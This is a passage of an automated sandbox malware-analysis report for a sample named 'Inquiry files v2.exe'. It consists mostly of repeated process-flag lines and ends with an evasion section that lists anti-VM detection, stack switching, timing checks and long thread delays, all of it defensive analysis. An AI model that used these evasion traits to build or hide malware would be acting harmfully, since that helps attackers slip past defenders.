                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: Inquiry files v2.exe PID: 7124, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Users\user\Desktop\Inquiry files v2.exeMemory allocated: 13D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeMemory allocated: 2F70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeMemory allocated: 2E70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeMemory allocated: 81B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeMemory allocated: 91B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeMemory allocated: 9370000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Inquiry files v2.exeMemory allocated: A370000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeMemory allocated: 880000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeMemory allocated: 2790000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeMemory allocated: B80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeMemory allocated: 7380000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeMemory allocated: 8380000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeMemory allocated: 8520000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeMemory allocated: 9520000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F096E rdtsc 7_2_012F096E
                Source: C:\Users\user\Desktop\Inquiry files v2.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6412Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2058Jump to behavior
                Source: C:\Windows\SysWOW64\runas.exeWindow / User API: threadDelayed 9824Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.7 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.2 %
                Source: C:\Users\user\Desktop\Inquiry files v2.exe TID: 4416Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2196Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6748Thread sleep time: -922337203685477s >= -30000sJump to behavior
